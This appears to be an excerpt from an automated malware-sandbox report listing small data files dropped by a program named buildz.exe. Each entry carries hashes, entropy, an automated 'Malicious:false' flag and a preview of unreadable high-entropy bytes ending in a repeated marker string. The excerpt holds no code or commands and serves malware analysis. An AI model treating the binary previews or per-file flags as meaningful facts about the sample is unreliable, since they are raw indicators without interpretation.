                        SHA-256:499B36E4B5CF0B0420049922CF6D6B4E74004AB6B7E49A81DDB97AC6A2FDB690
                        SHA-512:3A21C1771E21C2E9F224310654458AB5B8035EE6722959993F816A0BBA7A37C0092EF0AE684217AE5D4E06B622F46FEDC935E12B269D91FDC2DC69453AEF7477
                        Malicious:false
                        Preview:<?xml.+0h.{.B3..)..X..rS.W....$R...4S.........sX....U{.;0.L..<6.&S.?....eZ!.../..<.\q.*`.];....W.`*.'-....X....C...,......r"...t...s....SOH.(*....s<..I.......cZ..vK.m}....d._.0q.xM.G...@5@.....f.|.C2u.....M,....n.p.....s~l}..r.q.N..Q.N.3../S........D_.....E'<.S....M......0~u....JhK.WL....%ns...Cs]/........?.pz.3q.m*..FZy.oF.l.|z.T.#EhA..c'8..............d.@..j..54J....Kdcs..1..;G.-..alo..q{.r.f.E..i....D.UJtr'..SCr.^..8Z.!M31(!.."&)...g8_3...`.....rgI..q>.%.Eh.C.U.P.#...gv..!E."..O...tu1)+B.F.9^....W.+..O.%.g%(Vu...}Y....I...fo..I.x$.'..r).B....Lji=.T.s..@..K$y.x..x..v.............L....../&...o..L.}.ZU?....TT.F.<..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):746
                        Entropy (8bit):7.644173992227218
                        Encrypted:false
                        SSDEEP:12:Ruqf2EXGmF3y2tfF8Y7XHZyr9b36fuPWmTtbLxbApKfxXvTb26Gcii9a:08GWftfFP7X5y13efktbFKQBzGbD
                        MD5:2FE794997A47A8D939887C0FB51FAB02
                        SHA1:A1A98CE658C12ABA75A27E97388BC7F0F16610CA
                        SHA-256:DF612BE34C4E794A23A2D7FA00B878E3DFAD00A325110A5588A49F9DF120FA2D
                        SHA-512:C6AA70EAF4BE1AD3306AAA9EDE4AC51965E3CD1E29845023722AD8DAF67C756D983E0C7948D50A2DC31E3825B9B56B107352E077427C56DE83365667573D06BE
                        Malicious:false
                        Preview:<?xmlCD.2......f}5 .6*PX..82!=C .n.Z....t4...{sO.6....@,.U.\#w.,..].Y..E.B..4).o4....-4i.=.7..D.u0t&../A_..N...s.o(Q.C.p8.'70.Z...JW......k.6%.......71)B.'...B.yq.....$.}.......1{.@...2....I.R../...D+i.}C_....m.@g|Hj.h...M.;9.w..C.cV=Z.../..r..E..u..)..;....uk.K..k...&|}.8B:.G./.....q .3...f..........k64Y...x`W.M.v.s....%.0.....(UA.J.Xs).9S...:.#.1...Z0..OE.(......3..IU.....#.;..A.......5L...D....;A.~...('.l*.J.."]...)...L.,.....iv..R...8....C..XL.H..z`v.U.K..t.....J.$..t[..i.so......]......9..L.9.UUL&..._..T..._n.H>h!.......2.f ...;...R..de.8......B.e^.......@..DV..,Q.=BP./_.XT2d\{.NHS.....W.....#|.t..n..r-%(..=x...U..-K..XrI2.'.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):857
                        Entropy (8bit):7.736596617755663
                        Encrypted:false
                        SSDEEP:24:Iebeg4+FBbr4BB/hgwxRmC5eH9JgbRGbD:jaeFBbr4f/hgwW5iNUD
                        MD5:09A04C63A146E17B2BD0250DB2FF3397
                        SHA1:D67FADDF598BF84DE49099789EE860477091F240
                        SHA-256:2D66E6BF1B13DA7D5F7AEFF24688431B8EFC750BA96CDCE020CEACF785EDCA80
                        SHA-512:28E453CC981C4F3DAC499FD4204ABAF31EC6636DA4F5AF8B8CBEE1B4FE500C2E25DDEBD9321F43CB9C39235A613DE770C3E3EACB1D67C5CA073DF3DC846FCF05
                        Malicious:false
                        Preview:<?xmlg.P..:{.....o.8...n"f.A._V..'....s5.e?.Vqy..a.....B.4..W....C.xO.......bt.....N.ez7.b...g&.EBC...Uy%;ah..$.n.p.xYV.@.<*......Qj~.......{....AM...{.wQ...N.Y..9.>.><..Y..D..C.x.....+..$+@o$.....s.`.tu.^.Z.&P-..c..L.g..2..rw.1.m.Ad.Tc.........JXD..5.2u........$...|.S.`....2.v.(l.P.L}.....B..@....HC....DwW.........>....8..R,UwurX.8^.[.....X.5...G..0..L.RC..-).M._....q..Y..D..^...^$..O.d<_.8p...s.S.-... >-....f...*X.3..6.E.....I.M7...+r..ga/u.o..;A...?-S...N*i.y....M.8.#..D..&q...D...4_..1.......7...,....T....6m..e.8.}...]9..AH.......f...\25.....T .i...M.v...w.a..?...0...q8.A.......9.7r.Li....1{...GP.Pa..G..(....X#&c..."V._!..=.X.....X......MA:.4H.k..VW.bAF...J.^p......*Aw.}....R.l..t.. .......iZ... g.....<....f)...l.-2'......2..11B..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):886
                        Entropy (8bit):7.770019098384807
                        Encrypted:false
                        SSDEEP:12:/9xJuAlGQDvDQf/wh10eZ5poPpIn8eW+mvM79SISRo+PP3U1MdLhOPJu26Gcii9a:jdwLwBZzOin89lISe+Pq6KaGbD
                        MD5:E0902B63FA0354C202E63A5DE614AEF4
                        SHA1:0B94304C5A4B08A64F1E13D8DEE4A533A1242D38
                        SHA-256:737BF8AC58760304B521A36AD376A6525D084B34A1185B41642A9F078334954E
                        SHA-512:D0928C61208D02C1B761AE3B6E268FCD4F671A2E0F4ABD545C7DB8B64EFC22C2E0A217F9D13D7FB93B9B60E27FD4237093F26E2AF3D30522E1DE96E40C0361FE
                        Malicious:false
                        Preview:<?xml4p$.......D....4E..I.`.(....B....o.V...._.D..F.....7.l.?.Di,..:..+..L.e...d.. .R..M0......'.1.h@.Q.hv.j.K......{.B..$..$.}.R.^!.....U. ".^3y$v.?|~.`.Zp.....)u.....3.....pI;..`..._D..n}...47...3Xp.~..`..W..........[.d.iN.d.d.k.}c..Ft5..X....c.7D.y.a\....j..b_Z... H......9...:o=....W.7E..]8j..HT.p_..(..`.z1'...9.c.y._J...U.......(.1"h.g...#.T.......I....I[um...F..`...kR.>.....}..X...:..'.....UWG....%.U..5P.......=i$....b7"2./{N....../Sp..;.3.:J+..[./...{.Cu...4..,a...L.......%...R..w..z.n....f..H&>.0T,GY.."D. .'T..L.X..X.WZx.|q_....i.z.2...mVy..+F..7<#.gn...j..oy.iB.zB|X...O.....e<.R>]L.j.e.,|.t...'|.....D;.."s.....Y...[a....$.?.).6^y.*..)."Q.3C9.D.c3x.. .(..k.9y..`K..*..k......;..I...X.nQ....e....IG.l...%..u>.M...*.....\c$.U.(..t......Uj......yk....si.>_EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1003
                        Entropy (8bit):7.762671557777013
                        Encrypted:false
                        SSDEEP:24:EgUA3E04fFLX8mIpSo2sjfjdnY49NFXBxgYoV+O07GktGbD:5UU9aI7So2efBLNFXBSYoH0RUD
                        MD5:CA35C0003FCD6F888B259D50446CADE9
                        SHA1:1A11EF05F4E88F37E387A8C4110D2CBA2CEB8AD5
                        SHA-256:6AB72DA8095CA38D3089FE22D3D9AAA105C9834C20FC22AA3B4A03B99E972333
                        SHA-512:9DD872E847A84194992BD23CEEA96A36DCC697FBEE87853C9BBE8FCAC5B349C32435CEF00F458410CBF9E325A10061BA152708F0DB2359A80CCF573B7D957981
                        Malicious:false
                        Preview:<?xml.V6./J.8.b.m.."..63hQ...e...{.)az.........Z..\..~A@..98E&...z.q.&.tD..u.,f...ox...@."......0.6&...4..gBD..b.....".Cz..A.%.....lN.g...$.\*pN.]7..?.-^.<... N<.e.....P..>..&..`vq[0.y.+..F..9..0.'P.....W.j.(..vY../6..y...;^..../7vt.<W..,....k."......Z8...m)B.. /.lv.8...pva.G.mPnf..T..f(k.[..,...p...B.1f......I.<#.c.VL.Rz....@....u.M..tE8y..h.c..0..-i.C.2.%.......R...#.7....L...V.m..W....ip7f,`7v..!,..$J../R..2.?u...1.Y.J..o..n.X.@.d_Ma...._..X.....=...,..R.+....bGa....-.l.....s.x...vej.O..../.2.n.w...[.Pz.{.....i...1...R6.(...B.^x..5....(....},2.Q..1W.P...ev..........m.(;..]...>......W......|6=f.C..x-m>...l......hkik.>J......j...v..f.:.,#......l....%...8x..V..i.N,.k.6...j......4u.QF.>.k...k.HS..............tf......P(.#....Tk..'...PaVm..j....]9'Q..p.G......WJ.......r....<.."z...+.:..k..2..Dw_.....*.`.m.|.s..^.4n..3..(K@ev.M.Yn.}./.J..Ve...UH.W.cVBz..-Me......../.....>.dOEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):726
                        Entropy (8bit):7.633014033466708
                        Encrypted:false
                        SSDEEP:12:4BKjq8Rn+ZhnT8vE0XAtUULJDT7wfOzrXbxB+vCiOdnBNjKELe9baTQB7REjCyur:4BKX+bwvZX2NVDfwfOzhECiOdnbDe9Wu
                        MD5:52D033B3931F0215DEB3EA6E74F9549C
                        SHA1:5FA5AEDB28E9ACFEB036590A245D8C7E16CD35B2
                        SHA-256:721226E489729FB0264DD7352DBF07B7295859E78F34602106E4C4E617EDD580
                        SHA-512:1FA2893CE7CAA9BFCD7F7DD8D47E3B5FF8E52C9D364095C7CE83701EC7E583874072EDE5E5AE4A6AFB052445DF0FDE3AAF9DFCAEBD3EEEAEEF0962E0DA38646F
                        Malicious:false
                        Preview:<?xmlE }..WFmlQ!N.#.....5Z..L)...#..F.._.....&o....@.6Xo..3&..1\..JW .*...HZ....K...x.Z..*..\..;...5.?w"..~.pTB.g.C.I`.\....v.-.....H.....iQ>..(k.8.%C...>.NB.St....?./..1....@Kyo3v.;.E.q....j.....g..$.gvx.}..+...t.,.....SUr.a.\bq[Q.4).N...g[4c.:91..L.to.+.....>?o.....9)b2\.q..R..w...?...-...%....>."...1.R.k.V.1._.....9....1....j....kH0J.$......\R.R..<[p;.(.v..z..#...i,5.........R.......c.[{[.j~..-i9..>{..~...y.&./..L...RR..H>..$.....v.F.........L.S.k..IfF8...x...3.6K&,N.%.d....x...w...k8.T.P'.uTr..a.......K.%..#.0....}...2S=}..l@j..j..b.uE`.5.........e....n.$..\...R...2|J..D...}../..U9.W.F..K../..`mF.-.1"p.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):931
                        Entropy (8bit):7.735510258745663
                        Encrypted:false
                        SSDEEP:24:Ks1FueX8bQW5ykzWn54DAhiruYcHXivORGbD:Ks/UkW5LU4Demc3NRUD
                        MD5:2E6A854FB10552B060806AADCE8C032D
                        SHA1:D59623AC4CC148D0163EFFE9469CC1D21065E2F0
                        SHA-256:A702DFA9C448A384ECAF00B06F96311AF3279E31C95EAF20B9648235C4002DD9
                        SHA-512:2C8A93AD2E011AE926BCA0262571996199FA7BD1C80BD14E6F135232DDED7FDF71A2B291ABED3BAF765314459EB79980B41D32C31E7E388724707A56B28B1BB7
                        Malicious:false
                        Preview:<?xml..T.............#A{a.m..+\_.p_...Gp..,.f...V..~$/g..02..r>..R..b.L..hrz\.9Mm...../...1f.D 8.fjF.........9V....9..O=E... .K._w..yS......[..x....Uy.J...1,<..]>%....uE7.}?K.2.zM.-6.#z.*...>...DX..k...;7.).p...8.....{=.wl..0s..w...p..k..<....u?a.f#.p.W..q.4..T..dT9....[....lci2......@.L.zp.fl.....wA..U.W....y..V........cU.X,z...J..x..Vc.S....-..~.!..AU(M...{..>.><P/>...h'...n...N..f. JV....T,[m........2.........s"j}_.u....Z...."G.=..9...N0...2..9%#M..t..y.+...L..:$h&......CD..).+d.B.w.....'.....L.....2..../...4Nz3.m]G@.\!.:...iT.:*]..lR^u....</G.E *..U..s.q.F.......a...9.o@..x..p.p-.g.+..H)..Tc..........{...4.0.~.@..Yy8Kv..@. .....y5..........B@{..5s~@Z..M|.x......<..4......m(.B..wt..p.].M...)C=...........?..d....%..+.....\>C.f~D|.aX.y..~K;.g......U*....G;....e........Ny.r.dM.....>v...:......EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):923
                        Entropy (8bit):7.734234206279586
                        Encrypted:false
                        SSDEEP:12:XwtwHmBPJP2zNr9QbyxHMq5TqdJW7A6iMtU+Fv62K/sx11ti/EEQT+Xu26Gcii9a:x2PIzNy2Hi/MA6ioi2x08nm8GbD
                        MD5:B804F6DD16788AF68C29ECAC7D961054
                        SHA1:A7AFBEF614219F65C5AA17468FFB439CDB6E9F7B
                        SHA-256:B27E7359A51AC3BC4AA0A7708A89F50D5BBA0B4380BFEF7ED56127E0EBC40DC5
                        SHA-512:D097DD32B90CC2F549F28BB29DDDAAD0F91866CF17D482DDCE3A6002E1D400100E8944651138ED0C69D2E635CE39C3B1312194301F97F08AD6395755A851BA38
                        Malicious:false
                        Preview:<?xml#.0.SD.........S....$,8....9f.-.14.~.y_..y.n...5{......t....<..niQ.+8laY.QZ...=.......M....8Qn.A..1.Q..L*`..d..I..V.;..r>..n.....B.8...s...H....<.6.m.Zz..&a..n.N...f...n..K.....DZ...Fb...{W5O."...|_..U.l.J...k....%..CV..~.B..qr0B....^Xh4.Nk*...7.j9..r...Y....<..^......C=.....E,.uG.d..-.'._...`...@...a.;u.J.......\.d)_-.L.t...fn.......F.F..u..?...&t7.....AQ<_..5..~......e.&...xX$.H..*.r`b.+jlg......9.9.k.o._.|.....]..C.9HlJ......m8...._..MCv``./....(...N...-.+...u...JR......`;u......m...o]M<.^..u.yL...]......L...D...}E. @...9..*.}.....<R..o....:...[\W.l.0+.W.Q.....F.......0.8z....G..2..4..{....|..E......Z.v..g2..:..._$.....W.O..aH..Xv.1....1Np%.............\.1.c.llt!3!...#..{.f....hQ.#Xj2\Np.........\...y....2N..\........zNb.....0..e1.l...d....lUy.\....v.......Dz..H..u?..ru.....EAEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1267
                        Entropy (8bit):7.83263816530466
                        Encrypted:false
                        SSDEEP:24:2tc85xQeRRplzQXZFVZY4YrIGW9g5qsdm0/C/T1RJ+FqDqxae299meNZk/HGbD:Q5SezjQx90qsdm0KTJ+cWY/9hNZk/HUD
                        MD5:4A0B8CB722FFF6B3E5D216FA832039AB
                        SHA1:72E2BD470EF2FD88048718596B124475283BA551
                        SHA-256:6BD8D994F424E10A28D525AB339AEFF6A3BDCC61B43B15CC1C78B189851BB32B
                        SHA-512:C67590AF4999B61CE185C91538FF17CCCD95CFF1202466C34F2C45E15C761400E5C69069F11499474B7D3E063715135F59F777C445FCC2E5CB4BCDBF23456062
                        Malicious:false
                        Preview:<?xml.gX..z.l4*d.".G.h ..\!...>}....k....m...;.:._S..)..6.v`........}.7...S.......X./k(D=`..."..L...)..e`.9..x.<.tX.....O..QR."*...M>....g.....G..........h|P!_:..T|.Y...1.L.....l..?D.....eQ..C..a.NjI....."..7NrUn.q.%....U=g.....7..f.d.<..\n.}......hGt.5..>..f.f..I5..h......Hv$s.dE.X`.iO>_.=.......e......q'\.....JB1.Ion..w....,'.s....._4...]....v.J..^.z..yG%f.J.3.B$~......{a.\wtN.Y..ZH.........c6.g...`.......cx...*nz....p~U......Q....4Pd2......r....+.#..$RE...%....]....eb.Y.5{......3..bC.k*.1.....m.3.7.I......\T...3F.q.....>......nr...;a#...n.].o}...+....=..Zc.5.c"f..s..F.....<v..17.....".z.....Z.fIo..R...m...IZ5_az...4so...~....ae....|.f......t..Cb2..h..:......?.&.S.7o..+....Y.BRmQ.^~.$.....|.nQ.).@............}...t.....G....U.kd....'.=y)}......d..t<.[M..i.A........_-ir^.e.D..Y'3.....x..FC.+.....Ut..C...|.,T,......Y%.:...s.q.7.u,EI....v-.A...1.o(2i!......71...>........*A.8...y..}..V.....,.U.2...R.VQ.MV...R._.... ;P..h../...=l..|....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):719
                        Entropy (8bit):7.708683896822186
                        Encrypted:false
                        SSDEEP:12:lvNSVMXLTV7YzolrlLs+5/gDAsx8aABe6gEske989MUA42V6AL9Nv/26Gcii9a:lVSVsa8l2sgDR6pgEsr4N2MAJ1GbD
                        MD5:BC979A6BCE54A75DFAE4A93E1FEE082F
                        SHA1:D20C729084189F49F80E859F30F88FD1836D638E
                        SHA-256:CDF7CA9276BECBDF536BC18F02154C139A74404D98CAB24DD1D28F1DF2626F0B
                        SHA-512:46B2D53328058DBD9AB78207AF9BDCEF0D03227D4CAACDAF60074D11E6C094BC49F3959CCF3FEEBA29F798571B722990774374138AB02951C066CA7C401BDBA9
                        Malicious:false
                        Preview:<?xmlT./.........7S`.=U....<+h+...OZG..:.Q.]..KG.h.R....JkEw%..~..+-%.}...!..N....;...6....P^._.V.......aM..D..-.@......gRx%L..H..{....{......Ey%...+..l..z...e..#.......0.n...U......_".'W0SE....".r.RWB,y.Z.}"...^.).+]J.Bc.y...&..f........4..!0d.b.?'.\xL..B..MC.&..</b.:<>n.Rx.!.@....&...O1 ...<T....4.9,.(T.]..AG.....+..Y.m.d...!__...!z.L.....R..s...".%h.$.f.K..}.b.....P...r......b.D}.`.t.{.+.i....8vq....z.Ud...oA.S.P.O..yQ.lk*.......2c...N....o.q2...:..!.. .../b.....8...A..;.....WUFXh./N..D1A.24..g{#oc....>..'...3Nn..."...o.Y..)c...m>.6.(.\..8..k..n.z..n.R...4.)....&.g.U........|I.u....c....]........As.#....W.u|EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):723
                        Entropy (8bit):7.689845715695823
                        Encrypted:false
                        SSDEEP:12:0O4wZpC6SOgcVv0SCQ4olKQleeRloh0KlCVHzKAD26Gcii9a:TPvoOe8YpcuSGbD
                        MD5:1A68D52FE938DF2522CDF333FF7BA234
                        SHA1:D76699058EE7B15C2F39A33F98CC87D3A706FF2C
                        SHA-256:98FBD7CEF3D8D37BF3C322730B5035200789DB09BB24A2A1F4D7C7A50C385984
                        SHA-512:FA756F9F1C28FE52F0A27888B97D756567B4D9DC0FBC536DBC6A36665AAC3FF5A2E3239DABDA79E472C726982BE18F044261A70020BF978A0C6EEA2DBC0AE362
                        Malicious:false
                        Preview:<?xml..E..J.".0....v'.s...2(.n.Ag}.......\....A.m.|. Q7......WN.t.{...}*..A.a....V........=5...os.G....'kj.)C....]r..h].&.uq7..XI.,.^.tnO1M}........I.S.<$..B.a.........J]..U.U..z.<.....e.2..M.-..o.bn..8..eG=._JV.K..q.....*....0.@.G.V*u@od7...h.H..S;..9.L.....udv.;..{o)/.Y..\.Sc|......@6.r...A...r.p.....KKy..e.8w...U...9(....]..;.!7.?'.e'....~;#'.....N6.j...i..u.YO.......g...V.:..... .a?.....p.?....2..4....+..KE.$~].@q...H.6...c.BJ.....t.e......:^.M....R.S......r.t.4...9..#..\.W.\..r!.:.N..@.".|.y...}1.A..f.,.P.{{...>...i.....z#..Y.I.^N....T..E!..X.4.b.[...lB...S..J......$...D.,.0E].....K....*....`K.&.....#.s..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):817
                        Entropy (8bit):7.714195644059163
                        Encrypted:false
                        SSDEEP:24:mMAToCOMPJjX+HbZqnPq5CslIEJP4W5UUmtlzRGbD:mxbBr+Hb+2CwBmt5RUD
                        MD5:482EA1A8CBDAB58F57096F35ED76153B
                        SHA1:48C788563AD10920EF6CBB4897D644BDE0C91863
                        SHA-256:CC08FB25847415A0401F8CB7685426736EF07AD73A133DECCFFD366767193E9C
                        SHA-512:B67C5B0375456A60C63E2020E2DFC8C00621E9CBF00C1E1FA19B38A958287AB5BA9E2D32A58302A034CF4E61A8C8C6A6FAD98F1B204B1B1286F44831043601A4
                        Malicious:false
                        Preview:<?xml...n..v...I...8..3#........&...{.-y.^...{=.f?.0.T...w...A.....J.YX....0..B..S.,.../5~.]>........~g?.L..Z..OF..f..ov..iz..%.?M.w.^...%.Qt,=.........].RV.6...yL....l.Ka.a0..Q..t...3..j.....'.>e....'.*..3...%..._........5#.Y{..4...4.z.K$l.?........]...Y...~cD9......a.........p...5.)..4.e.;.d.-.!........v...V<._.....Nj..&qk....qy./J.:..Z..c^..c. _....[3..f@.d.n..S2.......S.%...t_j../?..<=.hyqq.Y<...BI;o.f...d....s..@.....AH.b.......3...w.l..A.'|7.=\.}p.R..^..!.H.m..f..Oc....../,..1..f}%...D..........0........I...9c;m...SoPY~!.H.6`9.P...h/&V...H|..?.gB.1@.;A...9.....q.38..e.:.9.Sh....s...........<.V.e#.5h-...%x;.J...u.Ht.....c.V.y..'.:..Z0..a'...g.]|.ki0.G..K.5@..+.....$......T.'.\y.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):719
                        Entropy (8bit):7.7060664700904224
                        Encrypted:false
                        SSDEEP:12:g2mgXREL9rQamVu8ZJc+c2ZYnLPaCFgYWgR3hC5RvVlAZWbvkyg+WrUYX26Gciik:gTSaBrQamVy+c3LyGflwAZwcigvGbD
                        MD5:AADA486BA393BFC4FA8CFA9A1E70AF88
                        SHA1:F3C635A45100168419C58843072AF96703F639B5
                        SHA-256:9924F9588238490B1CE93693F705EAFC8E30D52025F505F69C6C6A629A227EE9
                        SHA-512:690E938C97EED4E394D47149BB77817C1B11B690549FB1C25F70D4C9F949B206241C072CC12144CEB67EBF3A98928E648E98092E3F7DB0D17E103B101B15AE27
                        Malicious:false
                        Preview:<?xml.x...D...+.f.&.C...O..9r4....1I..2...;*.d..q.Pz;.o.l.@.....)/..9g...-f.#.o..[7M.>dV.n......`*$.M.O.fI.^F.0....gk..3...m.*..t.Gy...qt..6.....'Z.z}E..b.8..o..ag.g...?Er.)]k.t.....iYJ.5g..~.A....T.Gy...`..).t..xL.....@../7O..<.puJ...d.7#-.w....h.a c.Yo<.L..........xTL.9.!.z.MDEy?...o..zv..y/.m.*-P..,.K.;}?.n....sJe..^...C.85<VG0...Z.j...%...].U..B#=H.#...d.g.6...Y..R%w.y....R.8....g.4..d+e8....3U.^J.%baG^I. ....(b.\L...,..t.......t...|Ulx._.7.'o..XI.>.Q...../.=.Kro..4....e..h.`.P../...2@.c.#_.|....'4d..0..h>..T...&..q.r .zx..O........!.:....2...i..#d.x...u.gq....r..p)....L...|&.[......X....V.K.@..E....C.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):881
                        Entropy (8bit):7.719282243766543
                        Encrypted:false
                        SSDEEP:24:h80P3qvfxOM8vOeR2DKOW8d5mEpF9y2kpfZFGbD:ePfxOJ3qHkppfZFUD
                        MD5:F7ED5E37FB052EDEC4E745E24C9D781B
                        SHA1:B9AE91138C53726F6C023CEC9716B831F905FB87
                        SHA-256:73D51382F2877F7F67B8890A21B851DD3FA9635D62ABBD3449A39215C1218ACF
                        SHA-512:D275D1E2553E2AF5506D0E335419686C1E049BA14E262055C1A22DD6BF21F6E22C41D0A97F0C3872211E65BB12BBDECB1902851C87FCCC25D204B39ADEB23B13
                        Malicious:false
                        Preview:<?xml..A..e.PL....&7c'&...".a.k.p*n&.I`.e.D!3W....m..5..)..8.l....)..S..!...L.......Q...n..Y"(..az..2..@;......d7.,i....@..@n+...).1.....=.iywU.."."........u/_.^......;.=$.....pn}.....H.....v7.........<..hB.zo.0....Z6.. .z..I....S..n.2.Fz..4T.....f.K.M.S.u...Q'-......E.;]....}Cx..,......;...IU.q....,.....i?.iC......C.I+........SVs._..Z.d)...t.....X..Q+..LK..-b....\.....EN..Kh..;..)...S%..S...1.c.o...U._......)bs..k_.DUD.D...I$a..?z..<vR.d6..a.`../........SY.%&........c...j......`.'..6''.6<x..R.&?/O.....oy..qx>..[.......]........?.7&w.d.3+Y=.h.=1...Q..u..f..J..g.y.n.....y4..qw.R)...2.)......^)...t...1..vS.|.x.8.<.b......^.S8^...0..E...%q.....[.DPp*.^.W..._..c.....g.Er..k......y....e..Z*^4H(........U.i.....X././...._.v......M#.....\M.@..../......z...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):737
                        Entropy (8bit):7.693944864010471
                        Encrypted:false
                        SSDEEP:12:mgZEavJBbjWYI6DhEFyk9SIa3++arolVEhTVWFwes8XCKwUD26Gcii9a:3vTbCYIQE8SSnO+aU/KTWHCK/rGbD
                        MD5:638587BACC0CD0282DB84AC323D5C1AD
                        SHA1:CFD465E68DE1DCB9BD39F59A447ADF83FE18650D
                        SHA-256:C6794B6EEB1ED90D2F47DFCC3149CBA22956B6127FF34402411F6BFEFC72E413
                        SHA-512:5547A09CBA8AE77383400BB771787E01DEC4EC3B5507CDC3A971FF9AE3F46D5D7096F89DA748F1B9AFE2EE6C0516301A07092254F858D54289E42763C37BDEF1
                        Malicious:false
                        Preview:<?xml.....R.e>...}.Z.M.y...?. 'Y7.POK._'.<S%*B5mV.k..U.9a^.....r......+^..#..4...j.F8..V....h.u.u.D...?..".;b..M$..V.BR.....Y.v.......j.k... 1......-.rB..>..fA....~...).o....?w.U.W.y..".Gy..w..v..O....._..\}.......i....z&.Rj..G.L.y..6..e]L%...i..._....q..\.!.L/& .....GK.x.Xo.......`.u..G..x.....g.X@.eB...Ub7r.(X..%y.G>..2......#[..O..4..8..e.....~2.!_1.w...%... L.<...:x..I.....5.2s]...&m.P>..q.....<.^....g0r.........G..TI4.9).z..J.<t2.FX.p?..JP.$8..6..S...RF*.^....p...g.e#..v......Wp]...u...'.&..G..>...........^......m}.W..?36.AU.......#No...~Fi.....b....U........%..YM.....w0.N...x*.yX..X........[.....g0.f..McEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1421
                        Entropy (8bit):7.815192114340952
                        Encrypted:false
                        SSDEEP:24:721AdpJUMA4Gff9JvL9ElFTrBzL+9zNBavUw5R27SSnsyEvpSXpK6BKQmmiyIGbD:7R2MA4GfFJT9Erk9yvxriSssyEoBBKQd
                        MD5:7FAA5B26C8FA8C7B90FFAD566D7816C6
                        SHA1:8DDD9BFAD23BD9133378E5AF4426AA0B17E53D11
                        SHA-256:74A99FB6AF83A0D447B9EDBCD0AFF94E5D180BAE0E557FD77BAD0521F8C7CDB2
                        SHA-512:4AE5B173C5CDC0E397A359F7030D3FA7EEA0FD59B8AFD25C94171353CE7262C4DA8D10678E04D0143908EC7CA7835D5D18FC6FEE91A1B435C731A761226059C8
                        Malicious:false
                        Preview:<?xml#...{.!.<.K...d........1r..#im.Z..Z=...c.9V>rBI.N/e.aCts.....`y.......R.g..a.~.G..a....r..W.....~+gM......`CL....7.....?{.....D#aaiD.~.'...AF'....5....,.JL1@...@..[4+. ..`....crf[..e..)ap..[.L.......R)P...u...>.f.\m6u?.w%,....c?...Ho......&.....-....+B.4A.".on-T....Z...oj..\.S9....p.!..1C.. d.v.Q`._..o.R..Y.....C..Q./-..f.P_Q#...u.Bi..u....2.....&....4....=..0...K.{...?%[...h1bL.....r.a.mG.B........?k,S[.,.b...~......F..[!XC..-....;...E%1J...q+AA*.Z.(!.hT|....l.Cq?.|.....ne.....W.&.aN.w8......ak..k..3N./....!|8.:F2S....f..o.....|....../(u..L.#......{..H.}../.[......S.0......|...`...%vP;.%.='.5.c'.8..?(.Du...23.....JJ'..^.M.....h68).p..".2.u.h..{f4.*.m]...;@..,..>H...B.30.]v.......9p._|..........f#.m|v.,....y.!..o&...]......>....>x1....a......N+,....k........XK.7U..P.]!.7..%..0..I0".........).1....#...:z.I....xk1._q=S..8+I......Y.!.R(+...l.Z....u.-....S.RhJ7(...":.#..s.,.....g(.9.-.t........1..y...D....F.q...p..$......^...%..kj
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1171
                        Entropy (8bit):7.845817870994093
                        Encrypted:false
                        SSDEEP:24:u0Wi5DUmd8IOGX3qQgaGyRaV3Fx63Zh+cjNvURwEF+8fdf3uGbD:u0Wi5Djuyqgvgn6a+Jwo8peUD
